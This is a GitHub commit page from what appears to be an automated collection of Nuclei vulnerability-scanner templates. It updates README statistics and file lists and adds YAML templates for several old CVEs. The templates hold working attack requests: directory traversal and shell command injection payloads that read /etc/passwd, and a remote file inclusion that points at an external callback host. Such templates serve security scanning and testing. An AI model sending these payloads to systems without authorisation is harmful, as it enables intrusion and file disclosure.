Skip to content

Commit

Permalink
Auto Updated
Browse files Browse the repository at this point in the history
  • Loading branch information
test committed Sep 1, 2024
1 parent 5b68baf commit e822091
Show file tree
Hide file tree
Showing 3,620 changed files with 222,692 additions and 482,011 deletions.
The diff you're trying to view is too large. We only load the first 3000 changed files.
42 changes: 22 additions & 20 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -22,29 +22,31 @@
| CVE-2018 | 446 |
| CVE-2019 | 513 |
| CVE-2020 | 593 |
| CVE-2021 | 1734 |
| CVE-2022 | 2463 |
| CVE-2021 | 1732 |
| CVE-2022 | 2466 |
| CVE-2023 | 4750 |
| CVE-2024 | 4821 |
| Other | 23887 |
| CVE-2024 | 4827 |
| Other | 23893 |
## 近几天数量变化情况
|2024-08-25 | 2024-08-26 | 2024-08-27 | 2024-08-28 | 2024-08-29 | 2024-08-30 | 2024-08-31|
|2024-08-26 | 2024-08-27 | 2024-08-28 | 2024-08-29 | 2024-08-30 | 2024-08-31 | 2024-09-01|
|--- | ------ | ------ | ------ | ------ | ------ | ---|
|41421 | 41432 | 41435 | 41481 | 41498 | 41558 | 41572|
|41432 | 41435 | 41481 | 41498 | 41558 | 41572 | 41585|
## 最近新增文件
| templates name |
| --- |
| events-calendar-pro.yaml |
| CVE-2024-5061.yaml |
| CVE-2024-5879.yaml |
| CVE-2024-8016.yaml |
| CVE-2024-2694.yaml |
| CVE-2024-7858.yaml |
| CVE-2024-3998.yaml |
| CVE-2024-7122.yaml |
| CVE-2024-8319.yaml |
| CVE-2024-5024.yaml |
| CVE-2024-4401.yaml |
| CVE-2024-8252.yaml |
| CVE-2024-8274.yaml |
| CVE-2024-5784.yaml |
| Stripe-api-key.yaml |
| Facebook-client-id.yaml |
| Paypal-braintree-token.yaml |
| wp-events-manager.yaml |
| attire.yaml |
| default-cred-hertzbeat.yaml |
| CVE-2024-8108.yaml |
| CVE-2024-5212.yaml |
| CVE-2024-8276.yaml |
| CVE-2024-3886.yaml |
| CVE-2024-7435.yaml |
| CVE-2024-7717.yaml |
| cve-2018-13880.yaml |
| CVE-2022-4100.yaml |
| CVE-2022-4536.yaml |
| CVE-2022-4539.yaml |
3 changes: 2 additions & 1 deletion data.json
Original file line number Diff line number Diff line change
Expand Up @@ -175,5 +175,6 @@
"2024-08-28": 41481,
"2024-08-29": 41498,
"2024-08-30": 41558,
"2024-08-31": 41572
"2024-08-31": 41572,
"2024-09-01": 41585
}
18 changes: 17 additions & 1 deletion data1.json
Original file line number Diff line number Diff line change
Expand Up @@ -49182,5 +49182,21 @@
"CVE-2024-4401.yaml": "2024-08-31 02:18:20",
"CVE-2024-8252.yaml": "2024-08-31 02:18:20",
"CVE-2024-8274.yaml": "2024-08-31 02:18:20",
"CVE-2024-5784.yaml": "2024-08-31 02:18:20"
"CVE-2024-5784.yaml": "2024-08-31 02:18:20",
"Stripe-api-key.yaml": "2024-09-01 02:32:13",
"Facebook-client-id.yaml": "2024-09-01 02:32:13",
"Paypal-braintree-token.yaml": "2024-09-01 02:32:13",
"wp-events-manager.yaml": "2024-09-01 02:32:13",
"attire.yaml": "2024-09-01 02:32:13",
"default-cred-hertzbeat.yaml": "2024-09-01 02:32:13",
"CVE-2024-8108.yaml": "2024-09-01 02:32:14",
"CVE-2024-5212.yaml": "2024-09-01 02:32:14",
"CVE-2024-8276.yaml": "2024-09-01 02:32:14",
"CVE-2024-3886.yaml": "2024-09-01 02:32:14",
"CVE-2024-7435.yaml": "2024-09-01 02:32:14",
"CVE-2024-7717.yaml": "2024-09-01 02:32:14",
"cve-2018-13880.yaml": "2024-09-01 02:32:14",
"CVE-2022-4100.yaml": "2024-09-01 02:32:14",
"CVE-2022-4536.yaml": "2024-09-01 02:32:14",
"CVE-2022-4539.yaml": "2024-09-01 02:32:14"
}
3 changes: 3 additions & 0 deletions links.csv
Original file line number Diff line number Diff line change
Expand Up @@ -452,3 +452,6 @@ https://github.com/Kuray12/prv8_nuclei_templates
https://github.com/ZoomerTedJackson/Salesforce-ContentDocument-DetectorNuclei-Template
https://github.com/sylncereyes/The-Nuclei-Templates
https://github.com/lupedsagaces/my-nuclei-templates
https://github.com/Sajibekanti/Nuclei_templates
https://github.com/securitytaters/nuclei-templates
https://github.com/cyb3r-w0lf/nuclei-template-collection
32 changes: 0 additions & 32 deletions nuclei-templates/CVE-2000/CVE-2000-0114.yaml

This file was deleted.

32 changes: 32 additions & 0 deletions nuclei-templates/CVE-2000/cve-2000-0114.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,32 @@
id: CVE-2000-0114

info:
name: Microsoft FrontPage Extensions Check (shtml.dll)
author: r3naissance
severity: low
description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2000-0114
- https://www.exploit-db.com/exploits/19897
classification:
cve-id: CVE-2000-0114
remediation: Upgrade to the latest version.
tags: cve,cve2000,frontpage,microsoft

requests:
- method: GET
path:
- '{{BaseURL}}/_vti_inf.html'

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
part: body
words:
- "_vti_bin/shtml.dll"

# Enhanced by mp on 2022/01/27
33 changes: 0 additions & 33 deletions nuclei-templates/CVE-2005/CVE-2005-2428.yaml

This file was deleted.

25 changes: 25 additions & 0 deletions nuclei-templates/CVE-2005/cve-2005-2428.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
id: CVE-2005-2428
info:
name: CVE-2005-2428
author: CasperGN
severity: medium

description: Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, stores sensitive data from names.nsf in hidden form fields, which allows remote attackers to read the HTML source to obtain sensitive information such as (1) the password hash in the HTTPPassword field, (2) the password change date in the HTTPPasswordChangeDate field, (3) the client platform in the ClntPltfrm field, (4) the client machine name in the ClntMachine field, and (5) the client Lotus Domino release in the ClntBld field, a different vulnerability than CVE-2005-2696.
reference:
- http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf
- https://www.exploit-db.com/exploits/39495

requests:
- method: GET
path:
- "{{BaseURL}}/names.nsf/People?OpenView"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
name: domino-username
regex:
- '(<a href\=\"/names\.nsf/[0-9a-z\/]+\?OpenDocument)'
part: body
28 changes: 0 additions & 28 deletions nuclei-templates/CVE-2008/CVE-2008-5587.yaml

This file was deleted.

27 changes: 27 additions & 0 deletions nuclei-templates/CVE-2008/cve-2008-5587.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,27 @@
id: CVE-2008-5587

info:
name: phpPgAdmin 4.2.1 - '_language' Local File Inclusion
author: dhiyaneshDK
severity: medium
reference: https://www.exploit-db.com/exploits/7363

metadata:
shodan-query: 'http.title:"phpPgAdmin"'
description: "Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php."

requests:
- method: GET
path:
- '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00'

matchers-condition: and
matchers:

- type: regex
regex:
- "root:[x*]:0:0"

- type: status
status:
- 200
19 changes: 0 additions & 19 deletions nuclei-templates/CVE-2009/CVE-2009-0545.yaml

This file was deleted.

28 changes: 0 additions & 28 deletions nuclei-templates/CVE-2009/CVE-2009-4223.yaml

This file was deleted.

28 changes: 28 additions & 0 deletions nuclei-templates/CVE-2009/cve-2009-0545.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,28 @@
id: CVE-2009-0545

info:
name: ZeroShell <= 1.0beta11 Remote Code Execution
author: geeknik
severity: critical
description: ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action.
reference:
- https://www.exploit-db.com/exploits/8023
- https://nvd.nist.gov/vuln/detail/CVE-2009-0545
- http://www.zeroshell.net/eng/announcements/
- http://www.ikkisoft.com/stuff/LC-2009-01.txt
classification:
cve-id: CVE-2009-0545
tags: cve,cve2009,zeroshell,kerbynet,rce

requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22"

matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"

# Enhanced by mp on 2022/04/18
30 changes: 30 additions & 0 deletions nuclei-templates/CVE-2009/cve-2009-4223.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
id: CVE-2009-4223

info:
name: KR-Web <= 1.1b2 RFI
author: geeknik
severity: high
description: KR is a web content-server based on Apache-PHP-MySql technology which gives to programmers some PHP classes simplifying database content access. Additionally, it gives some admin and user tools to write, hierarchize, and authorize contents.
reference:
- https://sourceforge.net/projects/krw/
- https://www.exploit-db.com/exploits/10216
- https://exchange.xforce.ibmcloud.com/vulnerabilities/54395
- http://www.exploit-db.com/exploits/10216
classification:
cve-id: CVE-2009-4223
tags: cve,cve2009,krweb,rfi

requests:
- method: GET
path:
- "{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}"

matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: interactsh_protocol
words:
- "http"
Loading

0 comments on commit e822091

Please sign in to comment.